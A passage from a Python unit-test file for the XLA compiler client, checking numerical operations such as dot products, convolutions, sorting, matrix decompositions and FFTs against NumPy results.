c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
c.DotGeneral(
c.Constant(lhs),
c.Constant(rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [1, 1], xla_client.PaddingType.SAME)
result = np.array([[[
[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [2, 1], xla_client.PaddingType.VALID)
result = np.array([[[
[640., 700., 760.],
[1120., 1180., 1240.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
c.ConvGeneralDilated(
c.Constant(lhs),
c.Constant(rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(
c.Constant(np.transpose(lhs, (0, 2, 3, 1))), c.Constant(rhs), strides,
pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), [(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testReducePrecision(self):
c = self._NewComputation()
c.ReducePrecision(
c.Constant(NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[float.fromhex("0x1.32p-3")])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(
c.Constant(NumpyArrayF32(0.)),
c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayF32(lo)),
c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayS32(lo)),
c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
c.Sort(c.Constant(keys))
self._ExecuteAndCompareClose(
c, expected=np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32))
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)), dimension=0)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = b.ParameterFromNumpy(NumpyArrayF32(0))
q0 = b.ParameterFromNumpy(NumpyArrayF32(0))
p1 = b.ParameterFromNumpy(NumpyArrayS32(0))
q1 = b.ParameterFromNumpy(NumpyArrayS32(0))
b.Or(b.Lt(p0, q0), b.And(b.Eq(p0, q0), b.Gt(p1, q1)))
comparator = b.Build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
c.Eigh(c.Constant(a), full_matrices=True)
# TODO(b/129396575): Turn this test back on when it passes without fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.SVD(c.Constant(a))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(
c.Constant(a_vals),
c.Constant(b_vals),
left_side=False,
lower=True,
transpose_a=True)
self._ExecuteAndCompareClose(
c,
expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32),
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=np.fft.fftn(a, axes=(1, 2, 3)), rtol=1e-4)
# IFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=np.fft.ifftn(a, axes=(1, 2, 3)), rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
c.Fft(c.Constant(b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=np.fft.rfftn(b, axes=(1, 2, 3)), rtol=1e-4)
# IRFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=np.fft.irfftn(a, axes=(1, 2, 3)), rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
c.NextAfter(
c.Constant(np.array([1, 2], dtype=np.float32)),
c.Constant(np.array([2, 1], dtype=np.float32)))
out = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(np.array([eps + 1, 2 - eps], dtype=np.float32), out)
def testRegularizedIncompleteBeta(self):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538])
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606])
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677])
c = self._NewComputation()
c.RegularizedIncompleteBeta(c.Constant(a), c.Constant(b), c.Constant(x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=expected, rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
